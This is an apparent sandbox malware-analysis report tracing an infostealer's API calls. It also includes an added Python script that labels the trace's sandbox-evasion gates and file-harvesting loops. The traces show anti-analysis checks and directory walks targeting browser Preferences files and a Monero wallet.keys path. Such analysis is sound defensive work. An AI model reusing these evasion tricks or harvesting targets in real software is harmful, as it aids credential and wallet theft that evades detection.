                                • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                                • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                              • Instruction ID: 6b0851df024d570ee83375b9463608ad444015e55776f914caec84c7662da607
                              • Opcode Fuzzy Hash: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                              • Instruction Fuzzy Hash: FC110030910148ABCB14FF64DD52EED7339AF70300FC04159F81A5B692EF71AB09D695

                              Control-flow Graph

Control-flow graph (text summary of the rendered graph): 1c1220-1c1247 calls 1d89b0 and GlobalMemoryStatusEx; one branch, 1c1249-1c1271, calls 1dda00 twice, the other goes straight to 1c1273-1c127a; both reach 1c1281-1c1285, after which 1c1287 and 1c1289-1c1290 decide between returning through 1c129a-1c129d and calling ExitProcess at 1c1292-1c1294.
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                              • ExitProcess.KERNEL32 ref: 001C1294
                              Strings
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                              • Instruction ID: 61040eea1f1da2640a96c8256310a6e24c66d23e82c411431326c6ee297c3a2b
                              • Opcode Fuzzy Hash: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                              • Instruction Fuzzy Hash: A5016DB0D80308BAEB10EBE0DC49FAEBB78AB25705F208059F705B72C1D77495418799
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                              • Instruction ID: 58cd965297c62804d37abc2e6c033d49b70b734a17c05f1dcf54022e3a9794b9
                              • Opcode Fuzzy Hash: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                              • Instruction Fuzzy Hash: 1D0162B2944308EBC704EF95DD45BAEBBB8F704B25F10422AE545A3380D3745904CBA1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                              • ExitProcess.KERNEL32 ref: 001C1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                              • Instruction ID: 3d2d2482cb582aabc201830e5967484baf845bebe06df485a3dcb9c86b473bd2
                              • Opcode Fuzzy Hash: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                              • Instruction Fuzzy Hash: 6AE0E671985308FBE7106BA09D0AF097678AB15B01F104154F709761D1D7B56650969D
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001C10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001C10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                              • Instruction ID: 43bcbe6808e8632941de006a5b51afa8db644ba291e92c2da1c0baacd52e2f8c
                              • Opcode Fuzzy Hash: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                              • Instruction Fuzzy Hash: 42F0E271681308BBE714AAA4AC59FAEB7E8E705B15F305458F504E3280D6719E00CAA5
                              APIs
                                • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                                • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                                • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                                • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                                • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                                • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                              • ExitProcess.KERNEL32 ref: 001C11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                              • Instruction ID: a283d6094b48dbd68e8665895b993214926aafe130047504ce0a5bd0ed67cd1c
                              • Opcode Fuzzy Hash: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                              • Instruction Fuzzy Hash: C4E012B595430163CA0073F4AD0AF2A329C5B35349F08083AFA05E3343FB79F810956A
                              APIs
                              • wsprintfA.USER32 ref: 001D38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D38E3
                              • lstrcat.KERNEL32(?,?), ref: 001D3935
                              • StrCmpCA.SHLWAPI(?,001E0F70), ref: 001D3947
                              • StrCmpCA.SHLWAPI(?,001E0F74), ref: 001D395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D3C67
                              • FindClose.KERNEL32(000000FF), ref: 001D3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                              • Instruction ID: 4461e5c6d42108e221b41b9ba63afb6839398d2c24da5fb9e8171d68c0788b1a
                              • Opcode Fuzzy Hash: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                              • Instruction Fuzzy Hash: 77A161B2A00308ABDB24EFA4DD85FEE7378BF58300F044599E51DA6141EB759B94CF62
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,001E0B32,001E0B2B,00000000,?,?,?,001E13F4,001E0B2A), ref: 001CBEF5
                              • StrCmpCA.SHLWAPI(?,001E13F8), ref: 001CBF4D
                              • StrCmpCA.SHLWAPI(?,001E13FC), ref: 001CBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CC7BF
                              • FindClose.KERNEL32(000000FF), ref: 001CC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                              • Instruction ID: 5d440650d9afe22269974f0b09d7325150928002ecc91e6a037a870e2ae2ee02
                              • Opcode Fuzzy Hash: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                              • Instruction Fuzzy Hash: 68426572910114ABCB14FB70DD96EEE737DAF64300F804569F90AA6281EF349F49CB96
                              APIs
                              • wsprintfA.USER32 ref: 001D492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                              • StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                              • StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                              • FindClose.KERNEL32(000000FF), ref: 001D4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                              • Instruction ID: 88271e41953303d751eedc97ec8f5d0b307ef1151e849d075bb1108da632243e
                              • Opcode Fuzzy Hash: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                              • Instruction Fuzzy Hash: A06185B2900218ABCB24EBA0DD49FEE737CBB58700F04859DF509A6141EB71EB95CF95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                              • wsprintfA.USER32 ref: 001D45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                              • StrCmpCA.SHLWAPI(?,001E0FC4), ref: 001D45EB
                              • StrCmpCA.SHLWAPI(?,001E0FC8), ref: 001D4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D468B
                              • FindClose.KERNEL32(000000FF), ref: 001D46A0
                              • lstrcat.KERNEL32(?,014AE968), ref: 001D46C5
                              • lstrcat.KERNEL32(?,014ADAC0), ref: 001D46D8
                              • lstrlen.KERNEL32(?), ref: 001D46E5
                              • lstrlen.KERNEL32(?), ref: 001D46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                              • Instruction ID: c5f856407e258a052ae2599d85dd7bb0ee5b80aaa465ded0801dd50d23996156
                              • Opcode Fuzzy Hash: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                              • Instruction Fuzzy Hash: DC5187B6540318ABCB24FB70DD89FED737CAB58300F404599F649A2150EB74DB948F96
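The three function listings above (VirtualAllocExNuma followed by ExitProcess at 001C112B-001C1143, the VirtualAlloc/VirtualFree pair at 001C10B3-001C10F7, and the FindFirstFileA walk at 001D4580-001D46A0) are the ones a triage analyst reads by hand to recognise Stealc's sandbox checks and file harvesting. The script below is an added example, not Joe Sandbox code and not part of the sample: it parses this report's "APIs" bullet format into per-function call sequences, decodes the 8-hex-digit arguments, and applies three heuristic labels. The sample input is copied verbatim from the listings on this page. Two readings that the parser relies on are worth stating: GetCurrentProcess takes no parameters, so the five values shown for it at 001C112B are the stdcall arguments already pushed for the VirtualAllocExNuma call that follows (lpAddress 0, dwSize 0x7D0, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, node 0); and the two StrCmpCA targets at 001E0FC4/001E0FC8 are adjacent 4-byte-aligned constants the sandbox did not resolve, which is consistent with the usual "." and ".." skip but is an inference, not a captured string. The 256 MiB threshold for the large-allocation rule is an assumption chosen for this example; the 0x17C841C0 (399,000,000 bytes) and 0x0098967F (9,999,999 bytes) sizes are the report's own values.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: three "APIs" blocks copied verbatim from the
# Joe Sandbox function listing on this page (addresses and arguments as shown).
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
• ExitProcess.KERNEL32 ref: 001C1143
APIs
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001C10B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001C10F7
APIs
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
• RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
• wsprintfA.USER32 ref: 001D45A6
• FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
• StrCmpCA.SHLWAPI(?,001E0FC4), ref: 001D45EB
• StrCmpCA.SHLWAPI(?,001E0FC8), ref: 001D4601
• FindNextFileA.KERNEL32(000000FF,?), ref: 001D468B
• FindClose.KERNEL32(000000FF), ref: 001D46A0
"""

# One bullet line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then ", ref: ADDR" (or " ref: ADDR" when no arguments were captured).
LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

@dataclass
class Call:
    api: str
    module: str
    args: list               # ints for 8-hex-digit values, raw strings otherwise ("?", paths)
    ref: int                 # call-site address inside the dumped image
    subcall: Optional[int]   # callee the line was hoisted from, when the report says so

def parse_blocks(text):
    """Split the listing into per-function blocks; each block starts at an 'APIs' line."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = LINE.match(line)
        if not m or current is None:
            continue  # "Strings", "Memory Dump Source", hashes etc. are not call lines
        raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        args = [int(a, 16) if re.fullmatch(r"[0-9A-F]{8}", a) else a for a in raw]
        current.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                            int(m.group("sub"), 16) if m.group("sub") else None))
    return blocks

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
LARGE_ALLOC = 256 * 1024 * 1024  # assumed threshold for the memory-pressure rule

def mem_flags(value):
    return "|".join(name for bit, name in MEM_FLAGS.items() if value & bit) or hex(value)

def classify(block):
    """Heuristic labels for one function's call sequence (analyst judgement, not sandbox facts)."""
    names = [c.api for c in block]
    labels = []
    # VirtualAllocExNuma then ExitProcess in one small function: an unsupported-API gate.
    # Emulators that lack the NUMA variant return NULL, and the sample simply exits.
    if "VirtualAllocExNuma" in names and "ExitProcess" in names:
        labels.append("numa-alloc exit gate")
    # A very large VirtualAlloc released again in the same function: a memory-pressure probe
    # that fails on low-RAM analysis VMs.
    for c in block:
        if c.api == "VirtualAlloc" and len(c.args) >= 4 and isinstance(c.args[1], int):
            if c.args[1] >= LARGE_ALLOC and "VirtualFree" in names:
                labels.append(f"large-alloc probe ({c.args[1] // 1_000_000} MB, "
                              f"{mem_flags(c.args[2])}, {PAGE_PROT.get(c.args[3], hex(c.args[3]))})")
    # FindFirstFileA, two StrCmpCA against adjacent string constants, FindNextFileA, FindClose:
    # a directory walk whose two compares are (inferred) the "." and ".." skip.
    cmps = [c for c in block if c.api == "StrCmpCA"]
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= set(names) and len(cmps) >= 2:
        labels.append("directory walk (dot-entry skip)")
    return labels

def analyze(text):
    """Map each block's first call-site address to its labels."""
    return {block[0].ref: classify(block) for block in parse_blocks(text) if block}

if __name__ == "__main__":
    for ref, labels in analyze(SAMPLE).items():
        print(f"{ref:08X}: {', '.join(labels) or 'no rule matched'}")
```

Run it against a larger slice of the report (the "Part of subcall function" lines parse too, with the callee address kept in `subcall`) to see which functions carry the evasion gates and which carry the harvesting loops; the labels are starting points for the analyst, and the string-constant reading for the two StrCmpCA calls should be confirmed in the dump before it is relied on.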
                              APIs
                              • wsprintfA.USER32 ref: 001D3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D3EDA
                              • StrCmpCA.SHLWAPI(?,001E0FAC), ref: 001D3F08
                              • StrCmpCA.SHLWAPI(?,001E0FB0), ref: 001D3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D406C
                              • FindClose.KERNEL32(000000FF), ref: 001D4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
